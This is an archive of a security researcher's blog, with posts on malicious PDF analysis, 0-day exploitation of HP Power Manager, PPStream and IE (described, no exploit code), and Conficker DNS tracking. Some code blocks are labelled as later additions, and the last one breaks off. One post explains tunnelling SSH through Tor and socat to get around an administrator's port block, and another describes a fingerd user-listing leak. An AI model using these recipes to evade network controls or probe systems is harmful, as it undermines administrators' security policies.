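  clsid = [0x00021401, 0, 0, 'c000000000000046'].pack('VvvH16')
  ctime = (Time.utc(2010, 7, 22, 1, 16, 24).to_i + EPOCH_DIFF) * 10_000_000
  header = [0x4C, clsid, 0x01, 0x20, ctime, 0, 0, 0, 0, 1, 0].pack(HEADER_FMT) + ("\x00" * 10).b
  header + [id_list.bytesize].pack('v') + id_list
end

if __FILE__ == $PROGRAM_NAME
  info = parse_lnk(build_sample_lnk("\\\\fileserver.example\\share\\sample.dll"))
  info.each { |k, v| puts "#{k}: #{v.inspect}" }
end
```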
<br />
<br /></div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-61272118247945071972010-06-07T08:32:00.000-07:002012-11-12T09:42:34.452-08:00Hello Miami and Let's Talk on Portable Destructive PDF.<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">I'll be speaking at the 22nd FIRST conference in Miami next week. The topic of my presentation is PDF: Portable Destructive File: Attacks And Analysis. I'll be sharing how to dissect malicious PDFs and how we can perform an analysis on a malicious PDF file. Below is my abstract for the presentation. [http://conference.first.org/2010/Program/program.aspx]</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;"><br /></span>
<strong style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;"><br /></strong>
<strong style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">Portable Destructive File (PDF) Attacks and Analysis</strong><span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;"></span><br />
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
The increased prevalence of malicious Portable Document Format (PDF) files has generated interest in techniques to perform analysis on such documents. We have observed many attacks trying to abuse PDF vulnerabilities by hosting malicious PDF files on the Internet. The modus operandi involves luring people into opening malicious PDF files through social engineering. Emails are sent with a link to the PDF file, or with the malicious PDF file attached directly, to trap the victim into opening the file.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
In this presentation we will share with you how to analyze malicious PDF files that abuse JavaScript for exploitation as well as for carrying attacker payloads. What you learn here will help you to analyze malicious PDF files on your own using freely available tools.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; text-align: justify;">
<br /></div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-76499374800695759832009-11-19T02:55:00.000-08:002012-11-18T02:58:05.593-08:00Another 0day on HP Power Manager<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="p1" style="text-align: justify;">
I have been working on this <span class="s1">CVE-2009-2685</span>/ZDI (<a href="http://www.zerodayinitiative.com/advisories/ZDI-09-081/"><span class="s2">http://www.zerodayinitiative.com/advisories/ZDI-09-081/</span></a>) this afternoon and have now managed to get the dummy shellcode (calc.exe) running. yey..:D</div>
<div class="p1" style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6XYY5vmqMnwu44g67D8OY1XPTtaJwi1I5V-GPdCvfflTnJderIC2Wy6bHM7OCfN3rJ7sZaEbuV3N7P9GEyeZSHuBbGyxxLc65YlJ_C1VXV01dsFpLuTnVR9ffHaEm2FYznIu4/s1600/ishot_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6XYY5vmqMnwu44g67D8OY1XPTtaJwi1I5V-GPdCvfflTnJderIC2Wy6bHM7OCfN3rJ7sZaEbuV3N7P9GEyeZSHuBbGyxxLc65YlJ_C1VXV01dsFpLuTnVR9ffHaEm2FYznIu4/s400/ishot_3.png" width="400" /></a></div>
<div class="p1" style="text-align: justify;">
<br /></div>
<div class="p2" style="text-align: justify;">
<br /></div>
<div class="p1" style="text-align: justify;">
The bug was mentioned by ZDI at the link provided, and as claimed by the HP advisory, they have already patched the bug (<a href="http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01905743"><span class="s2">http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01905743</span></a>).</div>
<div class="p2" style="text-align: justify;">
<br /></div>
<div class="p1" style="text-align: justify;">
Ironically, using the same patch released by HP (4.9.2 - the latest one), I still managed to exploit the code. I guess HP didn't really patch the bug. This is probably a wild guess, but if we take a look at the workaround, HP is only recommending limiting HP Power Manager Server access to trusted users/IPs/networks.</div>
<div class="p2" style="text-align: justify;">
<br /></div>
<div class="p1" style="text-align: justify;">
Exploiting this bug is trivial, though. Reading any Windows exploitation materials is enough. This is a standard/classic stack overflow for the sprint bug. </div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com110tag:blogger.com,1999:blog-16641472.post-38197265509391615752009-10-20T00:16:00.000-07:002012-12-05T00:17:39.282-08:00PPStream 0day<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I just finished working on the <a href="http://www.pps.tv/" target="_blank">PPStream</a> exploit. The <a href="http://milw0rm.com/exploits/9585" target="_blank">p0c</a> to reproduce the bug was released at Milw0rm a few days ago. By using the default exploit, we'll notice that the bug is related to heap corruption rather than just a typical stack overflow in an ActiveX control. In a stack overflow in an ActiveX app, we can simply heap spray the browser and overwrite SEH to get control of EIP and jump to the heap to get to our shellcode. But since this is a heap overflow, overwriting the SEH pointer is not possible, because the SEH pointer is located inside a stack frame instead of a heap frame. For this particular exploitation, we need to rely on heap exploitation to get control of EIP.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After further analysis of the bug, I noticed that the param ofBackImage is the key to making the heap overflow occur. So I made a few changes to the p0c and started debugging the p0c again. Since the key point of heap exploitation is to get control when the heap is coalescing, we need to reach this assembly code (this is where the heap does the coalescing; we can have an arbitrary overwrite if we can overflow the next/prev chunk):</div>
<br />
<span style="font-family: Courier New, Courier, monospace;">mov dword ptr [eax],ecx ds:0023:41414141=?????</span><br />
<br />
<div style="text-align: justify;">
Since my target machine is running XP SP1, I can still use the arbitrary overwrite [WHERE] on the VEH pointer. And to get a reliable value for my shellcode location [WHAT], I'm using heap spray to place my shellcode. Below is the screenshot of calc.exe getting executed when the vulnerable PPStream (V2.6.86.8900) opens the exploit page (via the IE browser) (I promised I wouldn't use the Heap Spray technique ;)).</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqUiinm0xrRGeOowwj7OXJoMaRYh2Gfv4rv1SJlMGPbX49Ku0fR5Qkgrd7nbl_0DI6XtIH6DnVpgAYenVXHgsUv9fSd3DziU2SULW-wd1xSj8FAQEgwV092KNU9DCtSpQhobJv/s1600/ppstream_0day_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqUiinm0xrRGeOowwj7OXJoMaRYh2Gfv4rv1SJlMGPbX49Ku0fR5Qkgrd7nbl_0DI6XtIH6DnVpgAYenVXHgsUv9fSd3DziU2SULW-wd1xSj8FAQEgwV092KNU9DCtSpQhobJv/s400/ppstream_0day_calc.png" width="400" /></a></div>
<br />
<br />
<div style="text-align: justify;">
I apologize for the very brief/basic information on this bug and also for not releasing the exploit code. The reason is that the current PPStream does not yet have a patch (at the time of writing this blog post). I hope that one fine day I can publish this simple exploitation dev article.</div>
<br />
<br /></div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-41893093656017448982009-07-22T00:48:00.000-07:002012-12-05T00:49:45.071-08:00Another IE 0-day<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Another 0-day was released in the wild targeting Microsoft Internet Explorer. The bug is inside msvidctl.dll when working with media files (*.gif has been used in the in-the-wild exploitation). Below is the in-the-wild exploit analyzed by us (we modified the shellcode to %uxcccc).<br />
<br />
Figure 1.0 shows the exception handler being executed and pointing to our jump address (0c0c0c0c).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIv1fVNnCu1Frni36QC6prxh-IRYZTJXVB9qxDuLwHd9OOgQdvVWJW56unfe4IfV34xaQJEnkom3Q9teHU4y0VPiq6_FmRMk9r0GDEArMnphvDMu-2q918EyP3C4lmKj5z4LQD/s1600/0day-ie1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIv1fVNnCu1Frni36QC6prxh-IRYZTJXVB9qxDuLwHd9OOgQdvVWJW56unfe4IfV34xaQJEnkom3Q9teHU4y0VPiq6_FmRMk9r0GDEArMnphvDMu-2q918EyP3C4lmKj5z4LQD/s400/0day-ie1.png" width="400" /></a></div>
<br />
Figure 2.0 shows the shellcode (xcc) being executed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuuMRSX01mAxYL_-KOEDpzcA3VhyiT6YkCcYOQ0ahB4E7DG55VSqjWisOQHA3V1UXQfnWAzTq-Ok6Dukey8wRZx6k5A4iPCTmOclu2AtSnssMsn-JD6SmP_olS3PEGcZEujrC9/s1600/0day-ie2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuuMRSX01mAxYL_-KOEDpzcA3VhyiT6YkCcYOQ0ahB4E7DG55VSqjWisOQHA3V1UXQfnWAzTq-Ok6Dukey8wRZx6k5A4iPCTmOclu2AtSnssMsn-JD6SmP_olS3PEGcZEujrC9/s400/0day-ie2.png" width="400" /></a></div>
<br />
<br />
<br />
<div style="text-align: justify;">
It's not really a common stack overflow bug. Please read the excellent vulnerability analysis done by Websense <a href="http://securitylabs.websense.com/content/Blogs/3434.aspx">here</a>.</div>
<br />
<div style="text-align: justify;">
MyCERT released the <a href="http://www.mycert.org.my/en/services/advisories/mycert/2009/main/detail/677/index.html">advisory</a> and workaround (yes, with pictures) on how to set the 'kill-bit' for this particular CLSID.</div>
<br />
<br /></div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-86432683211498216792009-07-15T00:25:00.000-07:002012-12-05T00:26:46.215-08:00Conficker.C and DNS<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I have been working to track Conficker's DNS queries in order to identify machines/networks infected with Conficker.C. Tracking 50K DNS names and 500++ queries from each Conficker instance is a bit troublesome when you have to record all the DNS queries (200M records/day) and compare them with the 50K/day Conficker.C domain names. :).<br />
<br />
The main idea of why we're working on this is so that infected machines can be identified based on the queries made by Conficker.C to contact Conficker.C's C&amp;C. Below is one of the results from our tracking of Conficker.C DNS queries to .MY domains in the hitlist:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSD-CF14buvtju87Nu1vq8TVIBSq8jpIm1X0zhasv84X3AwTy9oSTryGEqmcGVDjH9egeZk-Uk-VQ1kn6y9Fl9Buq4k5ibYrJ7T4rR6MRiWcvTD8Nlg3OGEo5WvnlytzQW8AV6/s1600/conficker_domain_dns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSD-CF14buvtju87Nu1vq8TVIBSq8jpIm1X0zhasv84X3AwTy9oSTryGEqmcGVDjH9egeZk-Uk-VQ1kn6y9Fl9Buq4k5ibYrJ7T4rR6MRiWcvTD8Nlg3OGEo5WvnlytzQW8AV6/s400/conficker_domain_dns.png" width="400" /></a></div>
<br />
<br />
<br />
Another result from the tracker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijq1kMAJ7Ihe01PSQZS8L76qrrzms-4-sXkh28eXhluFdNG67-NIQvyRzgLXB-a4jfac3RUkFtFRrjPBjSQ1Ggt3vQjt42r4oeb6Y_UdeuzQPxZPDxt2oTK60xDz-GulAYmfac/s1600/conficker_domain_dns_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijq1kMAJ7Ihe01PSQZS8L76qrrzms-4-sXkh28eXhluFdNG67-NIQvyRzgLXB-a4jfac3RUkFtFRrjPBjSQ1Ggt3vQjt42r4oeb6Y_UdeuzQPxZPDxt2oTK60xDz-GulAYmfac/s400/conficker_domain_dns_2.png" width="400" /></a></div>
<br />
Looking at the trends from both pictures, it's coming from the same source (see the geomap). Why?..:)<br />
<br />
The tracker is basically Ruby code built over the dnsruby and ruby-pcap libraries for collecting packets and processing only the DNS packets. So far, the tracker is working fine, except when it receives malformed DNS traffic, which is normally discarded by the tracker.
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-83803205387231307442009-03-30T00:32:00.000-07:002012-12-05T00:34:15.431-08:00Conficker: The other not so famous Variant A<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: justify;">
There are a lot more discussions going on about Conficker variant C (ConfickerC) due to 1st April. Why 1st April? The 1st of April is the day ConfickerC should call home for updates. The domain name generation algorithm used by ConfickerC makes blocking or detecting live ConfickerC update servers harder, since it will search for about 50K domain names. Please refer to SRI's excellent write-up for more information about ConfickerC here. MyCERT's advisory about ConfickerC is <a href="http://www.mycert.org.my/en/services/advisories/mycert/2009/main/detail/647/index.html" target="_blank">here</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
I can't say much about the current situation, but based on my observation of the DNS traffic we have, we only observed a low volume of traffic contacting ConfickerC domain names hosted in the .my domain. Maybe because it wasn't the time yet. (My timeframe of observation was 27-29 March 09.)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Compared to ConfickerA (variant A), I observed more traffic looking for the domain name trafficconverter.biz. Trafficconverter.biz is the server that will be contacted by ConfickerA. Take a look at a ConfickerA file sample and you'll see the domain name. It's very disturbing to notice that variant A is still out there screaming for its C&amp;C server while a lot more of the discussion has switched to ConfickerC.</div>
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">....................SNIP ...............SNIP....................<br />....................SNIP ...............SNIP....................<br />Sat Mar 28 17:29:00 +0800 2009 - 202.XXX.YY.132 is looking for trafficconverter.biz.XXX.my<br />Sat Mar 28 16:32:07 +0800 2009 - XXX.60.YY.229 is looking for trafficconverter.biz.XXX.my<br />Sat Mar 28 15:29:41 +0800 2009 - 203.XXX.YY.85 is looking for trafficconverter.biz.XXX.my<br />Sat Mar 28 15:46:26 +0800 2009 - 202.YY.56.XXX is looking for trafficconverter.biz.XXX.my<br />Sat Mar 28 15:15:55 +0800 2009 - 202.XX.XX.229 is looking for trafficconverter.biz.XXX.XXX.my<br />....................SNIP ...............SNIP....................<br />....................SNIP ...............SNIP....................</span><div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
During the timeframe (27-29 March 09), there were about 1167+ queries to DNS looking for trafficconverter.biz. It's still considered a big infection based on DNS query traffic alone. Luckily trafficconverter.biz is no longer running. But the infected machines still need to be cleaned up.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
MyCERT has already released an advisory for ConfickerA and also mentioned tools that can be used to remove ConfickerA. The advisory is here. If you haven't patched MS08-067, please do so.</div>
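The tracker described in the Conficker.C post above and the per-source "is looking for" lines in this post, as an added Ruby example (not the author's dnsruby/ruby-pcap tracker): it decodes the question name from a raw DNS query, matches it against a hitlist (exact name or label prefix, which is how a resolver's appended search suffix shows up as trafficconverter.biz.XXX.my), discards malformed input and emits the same log line format with a per-source count. Packet capture is out of scope; the input is (timestamp, source IP, UDP payload) triples, and the hitlist and packets are constructed below.

```ruby
# Constructed hitlist: Conficker.C generated about 50K names a day; a few
# made-up names stand in for them, plus the variant A rendezvous host.
HITLIST = %w[trafficconverter.biz qwxyz.my kjhgf.cc].freeze

# QNAME of the first question in an RFC 1035 message. Returns nil instead
# of raising on malformed or non-query input, which is the "discard
# malformed DNS traffic" behaviour of the tracker.
def dns_query_name(payload)
  payload = payload.b
  return nil if payload.bytesize < 12                   # shorter than the fixed header
  return nil if (payload.getbyte(2) & 0x80) != 0        # QR set: a response, not a query
  return nil if payload[4, 2].unpack1('n').zero?        # QDCOUNT == 0
  labels = []
  pos = 12
  loop do
    len = payload.getbyte(pos) or return nil            # ran off the end
    break if len.zero?
    # > 63 covers compression pointers (0xC0..), which cannot occur in the
    # first name of a message; the second test catches a truncated label
    return nil if len > 63 || pos + 1 + len > payload.bytesize
    labels << payload[pos + 1, len]
    pos += 1 + len
  end
  return nil if labels.empty?
  labels.join('.').downcase
end

# A hit when the name is a hitlist entry or has one as a label prefix.
def hitlist_match(name, hitlist = HITLIST)
  hitlist.find { |h| name == h || name.start_with?("#{h}.") }
end

# Minimal DNS A query for `name`, used to construct sample traffic.
def build_query(name, id = 0x1234)
  qname = name.split('.').map { |l| [l.bytesize].pack('C') + l }.join + "\x00"
  [id, 0x0100, 1, 0, 0, 0].pack('n6') + qname.b + [1, 1].pack('nn')
end

# Constructed capture: (timestamp, source IP, UDP payload) triples.
def sample_packets
  [
    ['Sat Mar 28 17:29:00 +0800 2009', '192.0.2.10', build_query('trafficconverter.biz.corp.example.my')],
    ['Sat Mar 28 17:29:05 +0800 2009', '192.0.2.11', build_query('www.example.com')],
    ['Sat Mar 28 17:29:07 +0800 2009', '192.0.2.10', build_query('qwxyz.my')],
    ['Sat Mar 28 17:29:08 +0800 2009', '192.0.2.12', "\x12\x34".b],            # truncated, discarded
    ['Sat Mar 28 17:29:09 +0800 2009', '192.0.2.13', build_query('notrafficconverter.biz')]
  ]
end

# Run the triples through the matcher; returns the log lines in the posts'
# format plus a per-source count, the basis for the "same source" remark.
def track(packets, hitlist = HITLIST)
  lines = []
  per_source = Hash.new(0)
  packets.each do |ts, src, payload|
    name = dns_query_name(payload) or next
    hitlist_match(name, hitlist) or next
    lines << "#{ts} - #{src} is looking for #{name}"
    per_source[src] += 1
  end
  { lines: lines, per_source: per_source }
end

if __FILE__ == $PROGRAM_NAME
  result = track(sample_packets)
  puts result[:lines]
  result[:per_source].each { |src, n| puts "#{src}: #{n} hitlist queries" }
end
```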
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-72120073591176368362008-01-08T06:38:00.000-08:002008-12-09T18:10:10.032-08:00[x] OpenSolarisI'm working on something with solaris. Finding old version of solaris like 9 and 8 is come to no hope.:D.Anyway, thank to SUN for releasing new solaris version 10. It's a brand new solaris with a couple of integration with GNU/Free Software project. So, i gave a try to install opensolaris on vmware server. The installation went smoothly. Opensolaris GUI installation need more than 512M of memory, though. Here is the screenshot taken on opensolaris installation. It's nice to see a brand new opensolaris. You can grab the iso for opensolaris from <a href="http://www.sun.com/software/solaris/solaris-express/get.jsp">here</a>. You need to register,though. Once you downloaded 3 iso dvds, you need to unzip and concatenate the files. Here are the steps that u can perform.<br /><br />1. unzip the iso files.<br /> shell>unzip sun-solaris-file-dvd-1.zip<br /> shell>unzip sun-solaris-file-dvd-2.zip<br /> shell>unzip sun-solaris-file-dvd-3.zip<br /><br />2. 
combine the files<br /> shell>cat sun-solaris-file-dvd-1 sun-solaris-file-dvd-2 sun-solaris-file-dvd-3 > <br /> sun-solaris.iso<br /><br />3.Burn into your dvd or if your're using vmware server for installation, just point the iso option into sun-solaris.iso file.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrORwN55UxL2K9XE_LF9OUmVZm3LmkcHHGtiCcUsVYmx7HD3T5gkeoXKGetig6TyTKXBev7qHvVzQaumW2UkDFq_b8kTga-LNxlu6LF4UxXxM2UUVq180T7ah0nrCSrSa3YE9x/s1600-h/07012008042.jpg"><img style="cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrORwN55UxL2K9XE_LF9OUmVZm3LmkcHHGtiCcUsVYmx7HD3T5gkeoXKGetig6TyTKXBev7qHvVzQaumW2UkDFq_b8kTga-LNxlu6LF4UxXxM2UUVq180T7ah0nrCSrSa3YE9x/s320/07012008042.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5153119146904299842" /></a><br /><br />The login screen from opensolaris. It's running on gnome windows manager.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_7aWBkFVvlQWvP0-RlMDl93GbafS5R9uMFmv_9q4ug9ThoBIpW1HlQbwXWUwmFb_uTGNtLlIo578GikvlwTjvxq_P8fA1fCmUplIVLeYF9YGQji9cJeHqTc_xsKuojnhLQf8/s1600-h/07012008044.jpg"><img style="cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_7aWBkFVvlQWvP0-RlMDl93GbafS5R9uMFmv_9q4ug9ThoBIpW1HlQbwXWUwmFb_uTGNtLlIo578GikvlwTjvxq_P8fA1fCmUplIVLeYF9YGQji9cJeHqTc_xsKuojnhLQf8/s320/07012008044.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5153119589285931346" /></a><br /><br /><br />Still remember those day when solaris 7,8,9 are the main target of 0wning?:X.Once done with the installation, i was try to enable a few legacy services by sun likes telnet, ftp, nfs,finger etc..etc.Argg, did i mention fingerd.?.Solaris implementation on fingerd was a mistake at least on version below than 10. 
By sending fingerd a query whose user name consists only of digits, fingerd would list information about every user logged into the system. I tried my luck on the new version to see whether the bug was still there. Enabling the service is just so easy :D, rather like Ubuntu's services GUI. :D Hehe. The bug I was looking for is no longer there. Thank God. :D Anyway, OpenSolaris is just another OS that I need to learn.yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-9281701177903266682007-12-25T07:29:00.000-08:002007-12-25T07:43:27.639-08:00hello ubuntuIt's been a good 2 years of service, Mr. Gentoo. I really appreciate all the good and awesome stuff we have been through. It's just time for me to change my mood. Again, thanks a lot. Hello Ubuntu. :D You're just so gorgeous! Everything just works, from the beginning until now. :D I'm a proud user of you, Mr. Ubuntu. The hardware detection is just awesome. I no longer have problems connecting Bluetooth, MMC cards, the HP hw6515, the Nokia N95, etc. It's awesome.<br /><br />I haven't blogged for quite some time now. Not really busy, but I just didn't have the mood for blogging. That's the main problem for me. :D I need to start changing this. Err, it's starting to sound like a new year's resolution. Gissshhhh. Really, I need to start actively writing on the blog. :Dyomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com4tag:blogger.com,1999:blog-16641472.post-78539257557954264202007-05-15T00:42:00.000-07:002007-05-15T01:07:15.488-07:00yearly update?Hahaa, it's been a while since my last post to this blog. Emm, I need to remind myself that I have a blog that needs to be updated. Yeahh. This blog is dedicated to myself as online notes about things related to my life, work, etc. 
So just a long update for this post. Ohh wait, I'll try to make it short.<br /><br />1. This blog has nothing to do with other people, companies, etc. It's my personal thoughts, opinions and views. [disclaimer]<br />2. My previous notebook, an Acer, has been sent to the service center again. This time my hard disk went crazy. Lucky for me to have friends who work in forensics. Using their gadgets, we managed to save almost half of my precious data. Hahah.<br />3. Got a brand new Dell XPS M1210. This sexy machine is running Gentoo Linux. Yehh, Gentoo roxx. :D No offence to other distros, since I'm using Fedora 6 on the desktop PC at home, Debian as my main Linux on VMware Server, FreeBSD as my home machine and OpenBSD as my lame router at home. :D OSS rulez, that's for sure. Since this machine came pre-installed with Vista [w0w..w0w], I got a chance to play with it for a while. Maybe because it's the Home edition, a few pieces of software can't operate and run well on it. Nokia PC Suite, DAP, Gaim, the Cisco VPN client, Thunderbird, OpenOffice (to name a few) just don't work well on my machine. There are always problems with these. Emm, the security features on Vista are quite good. Kudos to Microsoft for trying to create a better OS. :D<br /><br />4. Emm, upgrading Fedora Linux from Fedora 4 to Fedora 6 took 2 weeks to complete. Demm. Just to share a tip: every time we want to upgrade, please issue this command:<br />shell>yum clean all<br /><br />Please remove old kernels which are no longer needed (check the running one with uname -r first and leave it, plus one known-good fallback, installed).<br />shell>yum -y update<br />shell>rpm -qa | grep kernel<br />shell>rpm -e kernel.old.x.x.x.<br />shell>rpm -Uvh http://link.to.latest.fedora.x.x.release.rpm<br />shell>yum clean all<br />shell>yum -y update<br /><br />5. I'm blogging now through the 3G network using my Nokia N80 as a modem. Hehe. I'm using the N80 inside Windows XP in VMware inside Gentoo. Hahhaa. Crazy, huh? I'll provide a simple howto on how to enable it. 
<br /><br />6. I'm now an active IRC user but not active on the channels. Hehehe. If you see me on any channel, just say hi. :D<br /><br />7. *sighhh* Thinking of signing out. Hehe. Hopefully I will try to update more often after this. :D<br /><br />signing off,<br />y0mudsyomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-1157963869244986912006-09-10T23:09:00.000-07:002006-09-11T02:09:11.370-07:00bypassing port 22, if and only if your admin closed port 22Huh, I have been through a lot of R&D lately. I really don't get what R&D actually stands for in Malaysia. Is it relax&delay? :D Heh. Being someone who spent almost 2 years on R&D, I felt that way, at least for me. But thank God, I got my R&D done. Huhh. Ohh, back to the topic. Lately I stumbled across a few things/domains. It started with embedded systems, security competitions, bla bla bla. Embedded systems I'll leave for the next post, hopefully. :D So, now, back to the topic: bypassing a blocked SSH port. Hehe. Some people change the default SSH port from 22 to a port that is not blocked (80, 443). It's relatively rare to find an admin (if he does, woww, I'm amazed :p) who closes ports 80 and 443, since those two carry HTTP and HTTPS traffic. But do you really think people who provide free SSH services will change the default for our own good? I don't think so, man. So here is how you can actually bypass the blocked SSH port: tunnel it through Tor, which only needs to reach relays on 80 and 443. What you really need are tor (the onion router) and socat; privoxy is part of the usual Tor setup for web browsing, but the SSH path below talks to Tor's SOCKS port directly and never goes through privoxy. First things first.<br />-------------------------------howto begin----------------------------------------------------<br /><br />1. Install tor. 
(I'm using Gentoo, arrgg, the installation is just demm plain straightforward. Go figure for your distro.)<br /><span style="font-style:italic;">shell>emerge -av tor</span><br /><br />2. Install privoxy (only needed if you also want to browse through Tor; the SSH steps below don't use it).<br /><span style="font-style:italic;">shell>emerge -av privoxy</span><br /><br />3. Configure privoxy's config file.<br /><span style="font-style:italic;">shell>vi /etc/privoxy/config</span><br />#things that you should change.<br />#-----------------------------<br />#on line 661<br />listen-address 127.0.0.1:8118<br />#on line 1009<br />forward-socks4a / localhost:9050 .<br />#hehh, watch out for the "." at the end of localhost:9050 .<br />#you really need to put that magic "." (it means "no further HTTP parent proxy")<br /><br />4. Configure tor's config file.<br /><span style="font-style:italic;">shell>vi /etc/tor/torrc</span><br />#things that you should change.<br />#-----------------------------<br />#on line 30<br />SocksPort 9050<br />#on line 31<br />SocksListenAddress 127.0.0.1<br />#(newer Tor releases accept both in one line: SocksPort 127.0.0.1:9050)<br />#on line 34<br />#only use relays reachable on the ports your firewall lets out<br />ReachableDirAddresses *:80<br />ReachableORAddresses *:443<br /><br />5. Configure your (SSH luser) SSH client config.<br /><span style="font-style:italic;">shell>vi /home/yomuds/.ssh/config</span><br />#add these lines to your config file<br />Host myillegalssh.org<br />#whatever host alias you want can go here.<br /> ProxyCommand socat - SOCKS4A:localhost:chi.spunge.org:22,socksport=9050<br />#chi.spunge.org is just an example. put your real ssh server (and its port) here<br />#e.g. ProxyCommand socat - SOCKS4A:localhost:myhomessh.no-ip.org:22,socksport=9050<br />#SOCKS4A (not plain SOCKS4) matters: Tor resolves the hostname, so no DNS query for it leaves your box.<br /><br />
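What socat does for that ProxyCommand, as an added example that is not part of the original post: the SOCKS4A CONNECT exchange between the SSH client side and Tor's SOCKS port. It assumes Tor listens on 127.0.0.1:9050 as configured above; the target host is the one used in the post, and the `connect_via_socks4a` helper is mine, not socat's or Tor's code.

```python
"""SOCKS4A CONNECT handshake, the exchange socat performs for the ssh ProxyCommand.

Added example; assumes Tor's SocksPort on 127.0.0.1:9050 (from the torrc above).
"""
import socket
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 1
# Reply codes from the SOCKS4 spec.
REPLY_GRANTED = 0x5A
REPLY_TEXT = {
    0x5A: "request granted",
    0x5B: "request rejected or failed",
    0x5C: "identd not reachable",
    0x5D: "identd user-id mismatch",
}


def build_connect_request(host: str, port: int, userid: bytes = b"") -> bytes:
    """VN, CD, DSTPORT, DSTIP, USERID NUL, HOSTNAME NUL.

    SOCKS4A sets DSTIP to 0.0.0.x (x != 0) to signal that the proxy must resolve
    HOSTNAME itself. That is the whole point of using SOCKS4A over SOCKS4 with Tor:
    the DNS lookup happens inside the Tor network, not on the monitored client.
    """
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    hostname = host.encode("idna")
    if b"\x00" in userid or b"\x00" in hostname:
        raise ValueError("NUL byte not allowed in userid/hostname")
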